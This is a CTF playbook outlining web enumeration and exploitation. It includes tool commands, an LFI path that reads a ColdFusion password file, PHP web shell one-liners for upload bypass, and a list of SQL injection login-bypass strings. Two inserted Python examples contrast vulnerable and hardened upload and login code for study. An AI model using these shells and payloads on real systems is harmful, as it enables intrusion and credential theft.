CTF Playbook
Web

Web attack
Enumeration
  • Check it out in a web browser
  • What does it display?
  • Read entire pages
    • Look for emails, names, user info
    • Enumerate the interface: which CMS and version, server installation page, etc.
    • What potential vulnerabilities does it suggest?
      • LFI, RFI, directory traversal, SQL injection, XML External Entities, OS command injection, upload vulnerability
  • Is there a default web server page that reveals version information?
  • Use Web Application Scanner (Refer note)
    • Example, nikto
      • nikto -h 10.10.10.10 -output filename
  • Google for exploit
    • Rapid7
    • SearchSploit
  • If https
    • scan for heartbleed
      • sslscan 192.168.101.1:443
      • nmap -sV --script=ssl-heartbleed 192.168.3.157
    • Read the certificate
      • Does it include names that might be useful, e.g. the correct vhost?
  • View the source code
    • Hidden Values
    • Developer Remarks
    • Extraneous Code
    • Passwords!
  • Use curl
    • curl <ip address / dns>
  • View robots.txt
  • Brute forcing HTTP(s) directories and files
  • Tools
    • dirb
    • dirbuster
    • nikto
    • wfuzz
    • gobuster for quick directory search
  • Brute force directory recursively
    • If you find a directory, e.g. /admin, brute-force inside it too
      • dirb http://10.10.10.1/admin/
  • Looking for .git
  • Set extension
    • sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
  • Bruteforce subdomain
  • Creating wordlist from webpage
    • cewl
  • Redirecting webpage automatically?
    • noredirect plugin
  • If it's a login page
    • Try view source code
    • Use default password
    • Brute-force directories first (sometimes you don't need to log in to pwn the machine)
    • using curl
    • bruteforce credential
      • Burpsuite
        • Sniper and Cluster bomb attack types
      • Wfuzz
        • wfuzz -w pass.txt -L 20 -d "username=FUZZ&password=FUZZ" -hw 1224 http://<login-page-path>
      • Search credential in other service port
        • tftp
        • ftp
    • Enumeration for the credential
    • Search credential by bruteforce directory
    • Register first
    • SQL injection
      • SQLMap
    • XSS can be used to get the admin cookie
    • Bruteforce session cookie
  • If it's a CMS
    • Google their vulnerability
      • WordPress, Drupal, Joomla, Vtiger, etc.
    • Go to admin page
      • Joomla
        • /administrator
      • WordPress
        • /wp-admin
        • /wp-login
    • Wordpress
      • wpscan -u 192.168.3.145 --enumerate u,p,t (users, plugins, themes)
      • Brute-force login page
        • wpscan -u <ip> --username <name> --wordlist <path-to-wordlist>
      • Random user agent
        • wpscan -u http://cybear32c.lab/ --random-agent
      • Zoom.py
        • enumerate WordPress users
    • Drupal
      • droopescan https://github.com/droope/droopescan
      • /CHANGELOG.txt to find version
    • Adobe Cold Fusion
      • Metasploit - Determine version
      • /CFIDE/adminapi/base.cfc?wsdl
      • Version 8 vulnerabilities
        • FCKeditor
          • use exploit/windows/http/coldfusion_fckeditor
        • LFI
          • http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
    • Elastix
      • Google the vulnerabilities
      • Default login is admin:admin at /vtigercrm/
      • A shell can be uploaded as the profile photo
    • Examine configuration files (generic)
      • Examine httpd.conf / Windows config files
    • JBoss
      • JMX Console http://IP:8080/jmx-console/
      • War File
    • Joomla
      • configuration.php
      • diagnostics.php
      • joomla.inc.php
      • config.inc.php
    • Mambo
      • configuration.php
      • config.inc.php
    • Wordpress
      • setup-config.php
      • wp-config.php
    • ZyXel
      • /WAN.html (contains PPPoE ISP password)
      • /WLAN_General.html and /WLAN.html (contains WEP key)
      • /rpDyDNS.html (contains DDNS credentials)
      • /Firewall_DefPolicy.html (Firewall)
      • /CF_Keyword.html (Content Filter)
      • /RemMagWWW.html (Remote MGMT)
      • /rpSysAdmin.html (System)
      • /LAN_IP.html (LAN)
      • /NAT_General.html (NAT)
      • /ViewLog.html (Logs)
      • /rpFWUpload.html (Tools)
      • /DiagGeneral.html (Diagnostic)
      • /RemMagSNMP.html (SNMP Passwords)
      • /LAN_ClientList.html (Current DHCP Leases)
      • Config Backups
        • /RestoreCfg.html
        • /BackupCfg.html
  • Upload page
    • Upload a shell to get a reverse shell
    • Bypass file upload filtering
      • Rename it
        • upload it as shell.php.jpg
      • Blacklisting bypass: change the extension
        • php: .phtml, .php, .php3, .php4, .php5, .inc
          • bypassed by uploading an unpopular PHP extension, such as: .pht, .phpt, .phtml, .php3, .php4, .php5, .php6
        • asp: .asp, .aspx
        • perl: .pl, .pm, .cgi, .lib
        • jsp: .jsp, .jspx, .jsw, .jsv, .jspf
        • ColdFusion: .cfm, .cfml, .cfc, .dbm
      • Whitelisting bypass
        • bypassed by uploading a file with some kind of trick,
        • like a null byte injection (shell.php%00.gif),
        • or a double extension on the uploaded file (shell.jpg.php)
      • GIF89a;
        • If they check the content, just add the text "GIF89a;" before your shell code:
          <? system($_GET['cmd']);//or you can insert your complete shellcode ?>
      • In image
        • manipulate data
          • exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg
        • rename it
          • mv lo.jpg lo.php.jpg
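As an added example (not from the playbook), the kind of extension checks the tricks above defeat, next to a hardened allowlist check that rejects every one of them; the filenames and file bodies are constructed samples:

```python
import re
import secrets

# Added example for the upload-filter tricks above; constructed code, not from the playbook.
# Image types accepted, with the magic bytes a genuine file of that type starts with.
ALLOWED = {"jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
           "png": (b"\x89PNG\r\n\x1a\n",), "gif": (b"GIF87a", b"GIF89a")}

def naive_blacklist(filename: str) -> bool:
    """Blocks only a final '.php', so .phtml/.php5/.pht slip through."""
    return not filename.lower().endswith(".php")

def naive_whitelist(filename: str, data: bytes) -> bool:
    """Accepts a name if any dot-separated part is an image extension and the body starts
    with GIF89a, so shell.jpg.php, shell.php.jpg and shell.php%00.gif all pass."""
    parts = filename.lower().split(".")[1:]
    return any(p in ALLOWED for p in parts) and data.startswith(b"GIF89a")

def hardened_check(filename: str, data: bytes) -> bool:
    """Allowlist done properly: no null bytes (raw or %00), exactly one extension, that
    extension in ALLOWED, magic bytes matching it, and no PHP open tag anywhere in the
    body (the exiftool -Comment trick hides one inside an otherwise valid JPEG)."""
    name = filename.lower()
    if "\x00" in name or not re.fullmatch(r"[a-z0-9_-]+\.[a-z0-9]+", name):
        return False      # '%00', '..' and double extensions all fail the pattern
    ext = name.rsplit(".", 1)[1]
    if ext not in ALLOWED or not data.startswith(ALLOWED[ext]):
        return False
    return b"<?" not in data

def storage_name(filename: str) -> str:
    """Never keep the client's name: store under a random one with the validated extension."""
    return f"{secrets.token_hex(16)}.{filename.lower().rsplit('.', 1)[1]}"

# Constructed sample bodies: the page's GIF89a-prefixed shell versus a genuine GIF header.
PHP_SHELL = b"GIF89a;<?php system($_GET['cmd']); ?>"
REAL_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;"

if __name__ == "__main__":
    for name, body in [("shell.phtml", PHP_SHELL), ("shell.php.jpg", PHP_SHELL),
                       ("shell.php%00.gif", PHP_SHELL), ("shell.jpg.php", PHP_SHELL),
                       ("shell.gif", PHP_SHELL), ("logo.gif", REAL_GIF)]:
        print(f"{name:17} blacklist={naive_blacklist(name)!s:5} "
              f"whitelist={naive_whitelist(name, body)!s:5} hardened={hardened_check(name, body)}")
```

Magic-byte and tag checks are heuristics; a production upload handler would also re-encode the image and serve uploads from a location where the server never executes scripts.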
  • Phpmyadmin
    • Default password root:pma
  • Webmin
    • Has known vulnerabilities; Google them.
  • Identify WAF using wafw00f
  • cewl: spiders a given URL up to a specified depth and returns a list of words that can then be fed to password crackers
  • WMAP Web Scanner
    • web application vulnerability scanner
Exploitation
  • Heartbleed exploit
    use auxiliary/scanner/ssl/openssl_heartbleed
    set RHOSTS 192.168.3.212
    set verbose true
    run
  • XSS
    • Session hijacking / Cookie theft. Steal cookie to get admin privilege
    • use xsser tool
  • Local File Inclusion
  • SQL Injection
    • Enum using nmap
      • nmap -sV --script=http-sql-injection <target>
    • Using jsql
    • Using sqlmap with a login page
      • Capture the request using Burp Suite and save it to a file
      • sqlmap -r request.txt
    • Crawl a page to find SQL injections
      • sqlmap -u http://example.com --crawl=1
    • Login bypass
      • 'or 1=1--
      • ' or '1'=1
      • ' or '1'=1--
      • '--
      • ' or '1'='1
      • -'
      • ' '
      • '&'
      • '^'
      • '*'
      • ' or ''-'
      • ' or '' '
      • ' or ''&'
      • ' or ''^'
      • ' or ''*'
      • "-"
      • " "
      • "&"
      • "^"
      • "*"
      • " or ""-"
      • " or "" "
      • " or ""&"
      • " or ""^"
      • " or ""*"
      • or true--
      • " or true--
      • ' or true--
      • ") or true--
      • ') or true--
      • ' or 'x'='x
      • ') or ('x')=('x
      • ')) or (('x'))=(('x
      • " or "x"="x
      • ") or ("x")=("x
      • ")) or (("x"))=(("x
      • known Username
        • admin' --
        • admin') --
    • Using error-based DB enumeration
      • Add the tick '
      • Enumerate columns
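As an added example (not the playbook's own code), a constructed SQLite login that shows why the bypass strings above succeed against a string-built query and fail against a parameterised one; the users table and passwords are made up:

```python
import sqlite3

# Added example for the login-bypass list above (constructed, not from the playbook):
# an in-memory users table, the vulnerable string-built query and the parameterised fix.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse'), ('bob', 'hunter2')")

def login_concat(username: str, password: str) -> bool:
    """Vulnerable: input is spliced into the SQL text, so a quote or -- rewrites the query."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False   # malformed query: the error a single tick provokes during enumeration

def login_param(username: str, password: str) -> bool:
    """Fixed: placeholders keep the values out of the query text entirely."""
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row is not None

# Payloads from the list above, placed where they are usually typed: comment-style ones
# in the username field (known username), OR clauses in the password field.
USERNAME_PAYLOADS = ["admin' --", "admin'--"]
PASSWORD_PAYLOADS = ["' or '1'='1", "' or 'x'='x", "' or 1=1--"]

def bypass_table(login) -> dict:
    """Map each (username, password) attempt to whether it logged in without the password."""
    attempts = {(u, "wrong"): login(u, "wrong") for u in USERNAME_PAYLOADS}
    attempts.update({("admin", p): login("admin", p) for p in PASSWORD_PAYLOADS})
    return attempts

if __name__ == "__main__":
    for fn in (login_concat, login_param):
        print(fn.__name__)
        for (u, p), ok in bypass_table(fn).items():
            print(f"  user={u!r:15} pass={p!r:15} -> {'BYPASSED' if ok else 'rejected'}")
```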
  • XML External Entity (XXE)
  • URL vulnerability
  • OS command Injection
  • Directory traversal
  • Dotdotpwn tool